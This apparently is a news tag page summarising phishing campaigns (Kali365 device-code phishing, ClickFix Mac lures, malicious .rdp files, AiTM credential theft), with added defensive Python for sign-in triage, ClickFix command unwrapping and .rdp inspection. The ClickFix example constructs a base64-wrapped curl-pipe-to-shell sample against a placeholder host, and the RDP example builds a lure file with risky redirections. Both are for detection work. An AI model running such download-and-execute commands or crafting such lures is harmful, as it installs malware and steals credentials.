Tag: Phishing

All articles tagged with #phishing

GTA 6 Pre-Order Buzz Triggers Malware Warnings
technology · 3 hours ago

GTA 6’s release hype has outpaced official pre-orders, leading to a wave of scams that promise free codes, beta keys, or exclusive trailers and instead deliver malware through fake installers and phishing sites. NordVPN Threat Intelligence found clone sites and trojanized Android adware aimed at fans, and stresses that only official channels should be trusted for GTA 6 information and access.

FBI Warns Kali365 PhaaS Bypasses MFA on Microsoft 365
cybersecurity · 1 day ago

The FBI issued a PSA about Kali365, a phishing-as-a-service kit that abuses Microsoft’s OAuth device-code flow to hijack Entra ID and Microsoft 365 accounts. The flow exists for input-constrained devices: the attacker requests a device code, the lure gets the victim to enter that code on Microsoft’s genuine sign-in page, and the victim completes MFA there, so the resulting access and refresh tokens are issued to the attacker without MFA ever being defeated. Kali365, sold via Telegram, bundles AI-generated phishing lures, automated campaigns, and real-time dashboards, and offers two attack modes: device-code phishing and a “Cookie Link” adversary-in-the-middle flow that captures the victim’s session cookie. Arctic Wolf observed global campaigns against Microsoft 365 tenants, with post-compromise activity including malicious inbox rules and newly registered devices. The FBI urges blocking device-code authentication with a Conditional Access policy, auditing existing device-code sign-ins, reporting incidents to IC3, and preserving phishing emails and records of suspicious activity. Device-code phishing has surged in 2026; other PhaaS tools, including EvilTokens and Tycoon2FA, use the same technique.
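The two controls the PSA calls for, blocking the device-code transfer method and auditing its use, can be scripted. The following is an added example written for this page, not code from the FBI, Arctic Wolf, or Kali365 analysis. It assumes sign-in records shaped like the Microsoft Graph `signIn` resource (the beta property `authenticationProtocol` equals `"deviceCode"` for device-code sign-ins), Exchange Online audit records with Operation `New-InboxRule` and Name/Value `Parameters`, and the Graph `conditionalAccessPolicy` body with an `authenticationFlows` condition; verify all three shapes against current Microsoft documentation and your own exports. All sample records are constructed.

```python
"""Device-code phishing triage and hardening helpers (added example).

Assumptions (verify against current Microsoft docs):
- Sign-ins: Graph `signIn` shape, `authenticationProtocol == "deviceCode"`.
- Audit: Exchange Online unified audit log, Operation "New-InboxRule".
- Policy: Graph `conditionalAccessPolicy` with `authenticationFlows`.
Sample records below are constructed, not real tenant data.
"""
from datetime import datetime, timedelta, timezone


def _ts(value):
    """Parse an ISO-8601 UTC timestamp such as 2026-05-01T09:12:00Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")).astimezone(timezone.utc)


# Constructed sample sign-ins: one successful device-code sign-in for alice,
# a normal OAuth2 sign-in for alice, and a failed device-code attempt for bob.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "alice@example.com", "createdDateTime": "2026-05-01T09:12:00Z",
     "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.10",
     "appDisplayName": "Microsoft Office", "status": {"errorCode": 0}},
    {"userPrincipalName": "alice@example.com", "createdDateTime": "2026-05-01T08:55:00Z",
     "authenticationProtocol": "oAuth2", "ipAddress": "198.51.100.7",
     "appDisplayName": "Microsoft Teams", "status": {"errorCode": 0}},
    {"userPrincipalName": "bob@example.com", "createdDateTime": "2026-05-01T10:01:00Z",
     "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.11",
     "appDisplayName": "Microsoft Office", "status": {"errorCode": 50126}},
]

# Constructed sample audit record: an inbox rule that silently deletes mail.
SAMPLE_AUDIT = [
    {"Operation": "New-InboxRule", "UserId": "alice@example.com",
     "CreationTime": "2026-05-01T09:20:00Z",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "SubjectContainsWords", "Value": "password;invoice"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
]

# Rule parameters that turn an inbox rule into a cover-up or exfiltration channel.
RISKY_RULE_PARAMS = {"DeleteMessage", "ForwardTo", "ForwardAsAttachmentTo",
                     "RedirectTo", "MoveToFolder", "MarkAsRead"}


def device_code_signins(signins, successful_only=True):
    """Sign-ins that used the device-code flow (optionally only successful ones)."""
    hits = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        if successful_only and s.get("status", {}).get("errorCode", 0) != 0:
            continue
        hits.append(s)
    return hits


def suspicious_inbox_rules(audit):
    """New-InboxRule events whose parameters delete, move, or forward mail."""
    hits = []
    for rec in audit:
        if rec.get("Operation") != "New-InboxRule":
            continue
        params = {p["Name"]: p["Value"] for p in rec.get("Parameters", [])}
        reasons = sorted(RISKY_RULE_PARAMS & params.keys())
        if reasons:
            hits.append({"user": rec["UserId"], "time": rec["CreationTime"], "reasons": reasons})
    return hits


def correlate(signins, audit, window=timedelta(hours=4)):
    """Users with a successful device-code sign-in followed, within `window`, by a
    risky inbox rule: the post-compromise pattern described for Kali365."""
    logins = {}
    for s in device_code_signins(signins):
        logins.setdefault(s["userPrincipalName"].lower(), []).append(_ts(s["createdDateTime"]))
    flagged = {}
    for rule in suspicious_inbox_rules(audit):
        user = rule["user"].lower()
        t_rule = _ts(rule["time"])
        if any(timedelta(0) <= t_rule - t_login <= window for t_login in logins.get(user, [])):
            flagged.setdefault(user, []).append(rule["reasons"])
    return flagged


def block_device_code_policy(display_name="Block device code flow"):
    """Conditional Access body that blocks the device-code transfer method for all
    users and apps. POST it to /identity/conditionalAccess/policies; start with
    state "enabledForReportingButNotEnforced" to see what it would break."""
    return {
        "displayName": display_name,
        "state": "enabled",
        "conditions": {
            "users": {"includeUsers": ["All"]},
            "applications": {"includeApplications": ["All"]},
            "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


if __name__ == "__main__":
    print("device-code sign-ins:", [s["userPrincipalName"] for s in device_code_signins(SAMPLE_SIGNINS)])
    print("correlated:", correlate(SAMPLE_SIGNINS, SAMPLE_AUDIT))
```

Run the policy in report-only mode first: headless tooling such as the Azure CLI on servers without a browser legitimately uses device-code sign-in, and those accounts need an exclusion or a migration to a different flow before the block is enforced.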

Kash Patel’s Based Apparel Site Used as Mac Malware Lure with Fake Cloudflare Page
technology · 4 days ago

Security researchers flagged BasedApparel.com, Kash Patel’s apparel site, for serving a ClickFix-style scam: on macOS it shows a fake Cloudflare verification page that instructs visitors to copy a command and paste it into Terminal. The copied text decodes to a hidden shell script that downloads malware capable of stealing browser credentials and crypto-wallet data and exfiltrates it to an attacker-controlled domain. The case shows how a compromised legitimate site can deliver an infostealer through scareware and a user-typed command rather than an exploit. Apple has added protections in macOS 26.4 against pasted Terminal commands; Based Apparel did not comment.
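The ClickFix lure works because the victim runs an opaque one-liner. Defenders and help-desk staff can unwrap such a command statically before anyone executes it. The block below is an added example for this page, not the researchers’ code, Apple’s macOS 26.4 mitigation, or anything recovered from the site; the sample command, host and path are constructed placeholders. It peels base64 layers, then reports whether the result fetches from the network and pipes into a shell.

```python
"""Static unwrapping of ClickFix-style "paste this into Terminal" commands
(added example). Decodes base64 stages and reports indicators; never executes.
The sample command and URL are constructed for illustration.
"""
import base64
import re

# Constructed lure: base64-wrapped script piped to a shell. The inner script
# (also constructed) fetches a payload from a placeholder host.
_INNER = "curl -fsSL https://example.invalid/update.sh | sh\n"
SAMPLE_COMMAND = "echo %s | base64 -D | bash" % base64.b64encode(_INNER.encode()).decode()

_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# base64 -D is the BSD/macOS spelling; -d/--decode are GNU and newer macOS.
_DECODE_HINT = re.compile(r"base64\s+(-d|-D|--decode)|openssl\s+(enc\s+)?-base64\s+-d")
_PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|k)?sh\b")
_FETCHERS = re.compile(r"\b(curl|wget|osascript|nscurl)\b")
_URL = re.compile(r"https?://[^\s'\"|;)]+")


def _try_b64(token):
    """Decode a candidate token only if it yields printable script text."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except Exception:
        return None
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def unwrap(command, max_depth=5):
    """Return the stages: the original command followed by each decoded layer."""
    stages = [command]
    current = command
    for _ in range(max_depth):
        if not _DECODE_HINT.search(current):
            break
        decoded = next((d for d in map(_try_b64, _B64_TOKEN.findall(current)) if d), None)
        if decoded is None:
            break
        stages.append(decoded)
        current = decoded
    return stages


def indicators(command):
    """Summarise what the command would do across all unwrapped stages."""
    stages = unwrap(command)
    joined = "\n".join(stages)
    return {
        "stages": len(stages),
        "decodes_base64": bool(_DECODE_HINT.search(command)),
        "pipes_to_shell": bool(_PIPE_TO_SHELL.search(joined)),
        "fetches_remote": bool(_FETCHERS.search(joined)),
        "urls": sorted(set(_URL.findall(joined))),
    }


def verdict(command):
    """block / review / allow, from how many exfil-or-execute indicators fire."""
    ind = indicators(command)
    score = sum([ind["decodes_base64"], ind["pipes_to_shell"],
                 ind["fetches_remote"], bool(ind["urls"])])
    return "block" if score >= 2 else ("review" if score == 1 else "allow")


if __name__ == "__main__":
    for i, stage in enumerate(unwrap(SAMPLE_COMMAND)):
        print("stage %d: %s" % (i, stage.strip()))
    print(indicators(SAMPLE_COMMAND), verdict(SAMPLE_COMMAND))
```

The same logic fits a clipboard-monitoring EDR rule or a help-desk “is this safe to paste?” check: a command that both decodes itself and pipes into `sh` is the ClickFix shape regardless of which brand the fake verification page impersonates.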

Stolen iPhones, Bigger Heists: The Underground Unlocking and Phishing Trade
technology · 12 days ago

Researchers from Infoblox traced a thriving underground market that sells iPhone unlocking tools and phishing kits on Telegram and other services, linking dozens of groups to more than 10,000 phishing domains. An unlocked stolen device can fetch hundreds to thousands of dollars, which funds a supply chain that lets criminals reach bank and crypto accounts through social engineering of the original owner, even as Apple hardens Find My and related protections.

Mass phishing campaign exploits enterprise lures to steal credentials from 35k users across 26 countries
technology · 21 days ago

Microsoft disclosed a large-scale credential-stealing phishing campaign that targeted more than 35,000 users across 26 countries (92% in the U.S.), with victims in healthcare, financial services, and other sectors. Attackers sent polished, enterprise-style emails about code-of-conduct reviews through legitimate email services, with embedded PDFs leading to an adversary-in-the-middle (AiTM) phishing flow that harvests Microsoft credentials and session tokens, so MFA is satisfied by the victim and replayed by the attacker. Victims pass CAPTCHA checks and several intermediate pages before the final sign-in page, and the destination varies by device type. The report also notes rising QR-code phishing, ongoing BEC activity, and Tycoon 2FA PhaaS infrastructure moving hosting to evade defenses, alongside two notable Q1 campaigns and a broader surge in phishing threats (about 8.3 billion from Jan–Mar 2026).

ConsentFix v3 automates OAuth abuse to hijack Azure accounts
technology · 23 days ago

Security researchers describe ConsentFix v3, an automated phishing workflow that abuses the OAuth 2.0 authorization code flow to steal tokens and hijack Microsoft/Azure accounts. The campaign uses Pipedream as its automation engine and hosts a spoofed Microsoft login on Cloudflare Pages; the authorization code returned after the victim signs in is exfiltrated and immediately exchanged for tokens, giving the attacker access to mail and files even when MFA is enabled. Suggested mitigations include token binding, behavioral detection rules, and restrictions on which applications may authenticate; how widely this variant has been adopted remains unclear.

AppSheet-Driven Phishing Campaign Exposes 30,000 Facebook Accounts
technology · 24 days ago

A Vietnamese-linked operation hijacks Facebook accounts by using Google AppSheet as a phishing relay, targeting Business account owners to capture credentials and 2FA codes. Roughly 30,000 victim records are spread across several infrastructure clusters (Netlify-hosted pages, CAPTCHA-gated pages, and Canva-generated PDFs), all of which feed stolen data to Telegram channels for resale on underground markets. The campaign illustrates how trusted platforms are repurposed as phishing infrastructure to inherit their reputation with filters and users.

Stealthy Python RAT Uses Hidden C2 Tunnel to Harvest Browser and Cloud Credentials
technology · 24 days ago

Security researchers uncovered DEEP#DOOR, a Python-based backdoor whose payload is embedded in a dropper and which persists through Startup scripts, Run keys, Scheduled Tasks, and optional WMI event subscriptions. It uses a Rust-based tunneling service (bore.pub) for C2 and offers full RAT capabilities: reverse shell, reconnaissance, keylogging, screen and audio capture, webcam access, and credential theft from browsers, cloud services, and Windows Credential Manager, alongside anti-analysis and defense-evasion techniques. Distribution appears to be phishing-based and targeted; the modular, largely fileless design means the tool could be repurposed by different actors.

RDP security prompts can misrender on multi-monitor setups after April updates
security · 26 days ago

Microsoft warns of a bug in which the new security warnings shown when opening Remote Desktop (.rdp) files can render with unreadable text and misaligned buttons when multiple monitors use different display scaling; it affects Windows 11, Windows 10, and Windows Server after the April 2026 updates. The prompt appears before the connection is made and shows the file’s signer status and the local resources it would redirect. The warning was introduced after increased attacker use of .rdp files in phishing campaigns (for example by APT29).

Threat Actors Weaponize Teams Messaging to Breach Enterprises
cyber-security-news · 1 month ago

UNC6692 runs a multistage intrusion that begins with mass email bombardment of the target and escalates through impersonation of IT staff in Microsoft Teams, steering victims to a phishing landing page hosted on AWS S3. The campaign then harvests credentials, deploys a modular malware suite (SNOWBELT), and uses cloud-based C2 and data staging to exfiltrate data and compromise domain controllers. Defensive takeaways: restrict external Teams access and monitor cloud egress and browser extensions for anomalous activity.

Phishers weaponize Apple change alerts to push fake iPhone scams
technology · 1 month ago

A phishing campaign turns legitimate Apple account-change emails into a fake iPhone purchase alert: the attacker places the scam text in the user-controlled Apple ID name fields, so Apple’s genuine notification carries the attacker’s message and a phone number. Recipients who call the number are exposed to remote-access scams or data theft. Because the emails originate from Apple infrastructure they pass SPF, DKIM, and DMARC, which shows how abuse of a legitimate feature can slip past authentication-based filters. Users should treat unexpected purchase notices with suspicion and verify any account change through official Apple channels rather than the contact details in the message.

Windows tightens RDP file use to block phishing-prone connections
security · 1 month ago

Microsoft’s April 2026 updates for Windows 10 and Windows 11 add protections against phishing with malicious Remote Desktop (.rdp) files. The first time a user opens one, an educational prompt appears; subsequent attempts show a security dialog listing the file’s publisher status, the remote address, and the local resources it would redirect, with all redirections off by default. Unsigned files carry a caution label; for signed files the publisher is shown, though users are still encouraged to verify it. The protections apply only to opening .rdp files, not to connections started from the Windows Remote Desktop client, and admins can temporarily disable them through a registry setting. Microsoft urges keeping the safeguards enabled, noting that attackers (for example APT29) have used rogue .rdp files to steal data and credentials, read clipboard contents, and relay smart-card authentication.
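The new dialog reports three things: whether the file is signed, where it connects, and which local resources it redirects. A mail gateway or analyst can extract the same facts from an attachment without opening it. The parser below is an added example for this page, not Microsoft’s code or a reproduction of the Windows dialog; it relies on the documented `.rdp` text format (one `name:type:value` line per setting, type `s` for string and `i` for integer) and on the `signscope`/`signature` lines that `rdpsign.exe` adds to signed files. The sample file and its address are constructed.

```python
"""Static triage of .rdp files (added example). Reports signature presence,
target address, RemoteApp launch, and local-resource redirections. Never connects.
The sample file is constructed; the address is a documentation placeholder.
"""

SAMPLE_RDP = """screen mode id:i:2
full address:s:203.0.113.25
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Review
drivestoredirect:s:*
redirectclipboard:i:1
redirectsmartcards:i:1
redirectprinters:i:0
redirectcomports:i:0
redirectwebauthn:i:1
username:s:victim
"""

# Settings that hand a local resource to the remote host, with why that matters.
REDIRECT_KEYS = {
    "drivestoredirect": "local drives readable and writable from the remote session",
    "redirectclipboard": "clipboard contents shared with the remote host",
    "redirectsmartcards": "smart-card authentication usable by the remote host",
    "redirectprinters": "local printers exposed",
    "redirectcomports": "serial ports exposed",
    "redirectwebauthn": "WebAuthn/passkey prompts forwarded to the remote host",
    "devicestoredirect": "plug-and-play devices such as cameras exposed",
    "usbdevicestoredirect": "USB devices exposed",
}


def parse_rdp(text):
    """Parse `name:type:value` lines into a dict; integer-typed values become int."""
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) != 3:
            continue  # blank or malformed line
        name, typ, value = parts
        name = name.strip().lower()
        if typ == "i":
            try:
                settings[name] = int(value)
            except ValueError:
                settings[name] = value
        else:
            settings[name] = value
    return settings


def is_enabled(settings, key):
    """True when a redirection setting is switched on (non-zero int or non-empty string)."""
    value = settings.get(key)
    if value is None:
        return False
    if isinstance(value, int):
        return value != 0
    return value.strip() != ""  # e.g. drivestoredirect:s:* or :s:C:\


def assess(text):
    """Return the facts the Windows dialog shows, from the file alone."""
    s = parse_rdp(text)
    redirects = [(k, REDIRECT_KEYS[k]) for k in REDIRECT_KEYS if is_enabled(s, k)]
    return {
        # Presence of a signature only; cryptographic validity needs a separate check.
        "signed": bool(s.get("signature")),
        "signscope": s.get("signscope"),
        "address": s.get("full address"),
        "remoteapp": s.get("remoteapplicationprogram") if is_enabled(s, "remoteapplicationmode") else None,
        "redirects": redirects,
    }


def rdp_verdict(report):
    """Unsigned plus redirections is the shape of the APT29-style lure: block it."""
    if report["redirects"] and not report["signed"]:
        return "block"
    if report["redirects"]:
        return "review"
    return "allow"


if __name__ == "__main__":
    report = assess(SAMPLE_RDP)
    for key, reason in report["redirects"]:
        print("%s: %s" % (key, reason))
    print(report["address"], report["remoteapp"], rdp_verdict(report))
```

A `signature` line proves only that someone ran `rdpsign.exe`, not that the signer is trusted; treat `signed` as a prompt to check the certificate, not as a pass. Real files may be UTF-16 with a BOM, so decode the bytes before passing text to `assess`.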

Week in Security: Acrobat Zero-Day, AI Exploit Engines and Global Intrusions Unfold
cybersecurity · 1 month ago

This week’s security recap flags a widely exploited Adobe Acrobat Reader zero-day (CVE-2026-34621), AI-enabled vulnerability discovery and exploit tooling (Anthropic Mythos), and a wave of state-sponsored and criminal activity ranging from Iran- and North Korea-linked campaigns against ICS and crypto infrastructure to fileless malware, new RATs, and a Windows kernel rootkit (RegPhantom). It also covers fiber-optic eavesdropping research, a major botnet takedown, and notable security tools and frameworks (MITRE F3, Betterleaks, and others). Patch quickly, monitor for AI-driven threats, and watch for phishing and supply-chain risks.

Fake iCloud deletion notices lure Apple users into phishing traps
technology · 1 month ago

Phishing emails impersonating Apple warn that iCloud storage is full and threaten immediate deletion unless the user upgrades, steering victims to malicious links built to capture bank details. The UK consumer group Which? warned of the scam, which mimics legitimate messages but gives itself away through dubious sender addresses and poor grammar. Do not click the links: check storage in Settings instead, report the email as phishing, and contact your bank if you entered any details.